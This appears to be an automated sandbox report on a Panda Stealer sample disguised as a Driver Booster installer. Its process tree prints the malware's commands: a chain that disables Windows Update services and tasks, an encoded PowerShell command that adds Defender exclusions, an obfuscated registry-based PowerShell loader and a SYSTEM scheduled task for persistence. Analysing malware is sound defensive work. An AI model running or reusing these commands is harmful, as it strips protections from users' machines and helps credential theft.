pandastealer | 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00

Analysis

max time kernel
3s
max time network
17s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
14-04-2024 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
Size

31.0MB
MD5

2a414765a282868d340c50552771afd9
SHA1

314b5d77f31a608d883967743bb9c7664bd3f109
SHA256

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
SHA512

51ef307b49077c05f3b1f8ce133d98653ab7f8d955ec2556b240b6262b0262cf6286315a4ba382478a67c993311098bf12f85004234e5316ec4975c122515dda
SSDEEP

786432:08zdak9FxZWQDktCxi7NRNRcr82SB+p2tEb1BqwnD58:0+19YQDkNRN6Z/Ym1HnD5

Score

10^/10

pandastealer discovery evasion exploit spyware stealer

Malware Config

Extracted

Family

pandastealer

Version

�u�#�gof��9b(�&�-֭��i�_g�m��L�q��ϯT�V�s��-�Y�ob�s�<�q��u z�D/?�َ��O;��d�gMɄ`xq@��k)��w�++�X��|>�M��f��dX��L�Or��f�C0�\1H�� ^ ��ߵ e')>}KmV��m��#�J��2E�!��N��O|Y=*ܖ��Q5^l��.��(��܉�A �sF�`��|��$Z%��dU3��c��c�!��.D煠c�_ >�sb�� a�Y

http://��9b(�&�-֭��i�_g�m��L�q��ϯT�V�s��-�Y�ob�s�<�q��u z�D/?�َ��O;��d�gMɄ`xq@��k)��w�++�X��|>�M��f��dX��L�Or��f�C0�\1H�� ^ ��ߵ e')>}KmV��m��#�J��2E�!��N��O|Y=*ܖ��Q5^l��.��(��܉�A �sF�`��|��$Z%��dU3��c��c�!��.D煠c�_ >�sb�� a�Y

Signatures

Panda Stealer payload 2 IoCs

Processes:

resource yara_rule

behavioral1/memory/1992-0-0x0000000000400000-0x00000000022FF000-memory.dmp family_pandastealer
C:\Users\Admin\AppData\Local\Temp\lrucache.exe family_pandastealer
PandaStealer
Panda Stealer is a fork of CollectorProject Stealer written in C++.
stealer pandastealer
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

icacls.exetakeown.exe

pid process

2808 icacls.exe
2248 takeown.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

driver_booster_setup.exelrucache.exedriver_booster_setup.tmpWCCNativeUpdate.exe

pid process

2880 driver_booster_setup.exe
2624 lrucache.exe
2512 driver_booster_setup.tmp
2484 WCCNativeUpdate.exe

resource	yara_rule
behavioral1/memory/1992-0-0x0000000000400000-0x00000000022FF000-memory.dmp	family_pandastealer
C:\Users\Admin\AppData\Local\Temp\lrucache.exe	family_pandastealer

pid	process
2808	icacls.exe
2248	takeown.exe

pid	process
2880	driver_booster_setup.exe
2624	lrucache.exe
2512	driver_booster_setup.tmp
2484	WCCNativeUpdate.exe

Loads dropped DLL 5 IoCs

Processes:

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exedriver_booster_setup.exe

pid	process
1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
2880	driver_booster_setup.exe
1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

2808 icacls.exe
2248 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1048 sc.exe
820 sc.exe
1160 sc.exe
2244 sc.exe
1032 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2564 schtasks.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3004 reg.exe
2176 reg.exe
968 reg.exe
2936 reg.exe
1756 reg.exe
912 reg.exe
1440 reg.exe
2516 reg.exe
2372 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

lrucache.exedriver_booster_setup.tmppowershell.exe

pid process

2624 lrucache.exe
2512 driver_booster_setup.tmp
2512 driver_booster_setup.tmp
1760 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

driver_booster_setup.tmppowershell.exe

description pid process

Token: SeDebugPrivilege 2512 driver_booster_setup.tmp
Token: SeDebugPrivilege 1760 powershell.exe

pid	process
2808	icacls.exe
2248	takeown.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

pid	process
1048	sc.exe
820	sc.exe
1160	sc.exe
2244	sc.exe
1032	sc.exe

pid	process
2564	schtasks.exe

pid	process
3004	reg.exe
2176	reg.exe
968	reg.exe
2936	reg.exe
1756	reg.exe
912	reg.exe
1440	reg.exe
2516	reg.exe
2372	reg.exe

pid	process
2624	lrucache.exe
2512	driver_booster_setup.tmp
2512	driver_booster_setup.tmp
1760	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2512	driver_booster_setup.tmp
Token: SeDebugPrivilege	1760	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exedriver_booster_setup.exeWCCNativeUpdate.exe

description	pid	process	target process
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2880	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	driver_booster_setup.exe
PID 1992 wrote to memory of 2624	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	lrucache.exe
PID 1992 wrote to memory of 2624	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	lrucache.exe
PID 1992 wrote to memory of 2624	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	lrucache.exe
PID 1992 wrote to memory of 2624	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	lrucache.exe
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 2880 wrote to memory of 2512	2880	driver_booster_setup.exe	driver_booster_setup.tmp
PID 1992 wrote to memory of 2484	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	WCCNativeUpdate.exe
PID 1992 wrote to memory of 2484	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	WCCNativeUpdate.exe
PID 1992 wrote to memory of 2484	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	WCCNativeUpdate.exe
PID 1992 wrote to memory of 2484	1992	23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe	WCCNativeUpdate.exe
PID 2484 wrote to memory of 1760	2484	WCCNativeUpdate.exe	powershell.exe
PID 2484 wrote to memory of 1760	2484	WCCNativeUpdate.exe	powershell.exe
PID 2484 wrote to memory of 1760	2484	WCCNativeUpdate.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880

C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp" /SL5="$40150,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt
4⤵
PID:1596

C:\Users\Admin\AppData\Local\Temp\lrucache.exe
"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2624

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1564

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:820

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1160

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1048

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1032

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:2244

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2936

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:3004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:1440

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1756

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2248

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2808

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:968

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2516

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2372

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2176

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1876

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1524

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1052

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:3000

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
PID:1016

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
PID:1988

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:2476

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:328

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:2676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
3⤵
PID:2652

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
4⤵
- Creates scheduled task(s)
PID:2564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"
3⤵
PID:1680

C:\Windows\system32\schtasks.exe
schtasks /run /tn "DBassistant"
4⤵
PID:2532

C:\Windows\system32\taskeng.exe
taskeng.exe {2C733B94-B17B-4042-ADE0-505C7207B682} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2588

C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
2⤵
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
3⤵
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
PID:2208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
PID:1472

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3331cd96-be95-46f9-bd19-6cee6c77ea53}
1⤵
PID:2312

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{55144820-2c5f-4067-a015-a50dd418f139}
1⤵
PID:1756

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\IObit\iobitpromotion.ini
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\1713116764\ENGLISH.lng
Filesize
24KB

MD5
8e7f2723f0e72bc6abefca738c9c1ca4

SHA1
969a4a6f31e146040a101d526886ede9a7c5c432

SHA256
f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b

SHA512
9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232

Download Submit
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
Filesize
2.7MB

MD5
0e31bfc197cf7557b6ba5c18ecb1e5b2

SHA1
78ec7c8f28568611cf524f30b67875e031a09cb2

SHA256
87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78

SHA512
700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe
Filesize
5.8MB

MD5
3d403676517f6a99de035a04dc3f3f82

SHA1
ed69d8f485374dfb58a5b651b1f3f1bab8ee9541

SHA256
668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e

SHA512
4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e

Download Submit
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
Filesize
681KB

MD5
6a4308bc229b64cf5bc6d359056b8980

SHA1
29f6484fafd50f0c00b5be01d97e82ffeda6f75b

SHA256
5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7

SHA512
f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
5d1e3ddd710c22a98c395c4ddf70d1d6

SHA1
617e9fbaf1faf9d8467f918ea38175313ccd8e9e

SHA256
428ac3eb102e83da4bf95f6349fbfcdaffe44555bc1e714518982fd520356bdb

SHA512
cc2bb444d351a5894af09666dbf01f608399c67a7d4debddaec96dc5ec8b87c7994543be44ec126102381aa43a0a56d8da696a8fbff90e817b5a026683fac2df

Download Submit
\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
Filesize
27.6MB

MD5
ccc48304afa2e7c58492babc297db8a4

SHA1
decd98730cf34e1567965f6fb7085569fc1053e8

SHA256
e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910

SHA512
79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04

Download Submit
\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
Filesize
1.2MB

MD5
68b52a0b8e3d45bf3b520a0e7f16dad1

SHA1
e50408326eafb5ca8adc70db29c33b64e25bbbbd

SHA256
b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b

SHA512
b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf

Download Submit
\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp\DriverBooster.exe
Filesize
8.6MB

MD5
5ff2b8b8bf24896093f7e44374fabf95

SHA1
69bc407fe124e7e475a90cb9702f768a4b412da3

SHA256
77b5f3864c9ded87ccdc2c550d1ac107c918c224ee9aeada6f3fd8834f935d91

SHA512
391ea2b19131d73f194afc2ddd594f8648e6acd9c0a7fabffcff1fb27d83ddbd91367bfbf32f7b354d31ae931dea04b73045236eb98848d65fe4de8ee02fb50e

Download Submit
memory/436-282-0x0000000000B70000-0x0000000000B93000-memory.dmp

Filesize
140KB

Download
memory/436-289-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

Filesize
64KB

Download
memory/436-398-0x0000000076EB1000-0x0000000076EB2000-memory.dmp

Filesize
4KB

Download
memory/436-278-0x0000000000B70000-0x0000000000B93000-memory.dmp

Filesize
140KB

Download
memory/436-292-0x0000000000CC0000-0x0000000000CEA000-memory.dmp

Filesize
168KB

Download
memory/436-287-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

Filesize
64KB

Download
memory/436-285-0x0000000000CC0000-0x0000000000CEA000-memory.dmp

Filesize
168KB

Download
memory/480-290-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/616-302-0x0000000000410000-0x000000000043A000-memory.dmp

Filesize
168KB

Download
memory/616-304-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

Filesize
64KB

Download
memory/616-306-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

Filesize
64KB

Download
memory/688-309-0x00000000003E0000-0x000000000040A000-memory.dmp

Filesize
168KB

Download
memory/688-311-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

Filesize
64KB

Download
memory/688-313-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

Filesize
64KB

Download
memory/768-315-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/1472-273-0x0000000072BB0000-0x000000007315B000-memory.dmp

Filesize
5.7MB

Download
memory/1472-277-0x0000000072BB0000-0x000000007315B000-memory.dmp

Filesize
5.7MB

Download
memory/1472-275-0x00000000015C0000-0x0000000001600000-memory.dmp

Filesize
256KB

Download
memory/1472-266-0x00000000015C0000-0x0000000001600000-memory.dmp

Filesize
256KB

Download
memory/1472-412-0x0000000072BB0000-0x000000007315B000-memory.dmp

Filesize
5.7MB

Download
memory/1472-413-0x0000000077050000-0x0000000077126000-memory.dmp

Filesize
856KB

Download
memory/1472-281-0x00000000015C0000-0x0000000001600000-memory.dmp

Filesize
256KB

Download
memory/1596-258-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/1596-98-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/1596-247-0x0000000000400000-0x0000000000A17000-memory.dmp

Filesize
6.1MB

Download
memory/1596-279-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/1596-177-0x0000000002F00000-0x0000000002F40000-memory.dmp

Filesize
256KB

Download
memory/1760-60-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

Filesize
9.6MB

Download
memory/1760-55-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
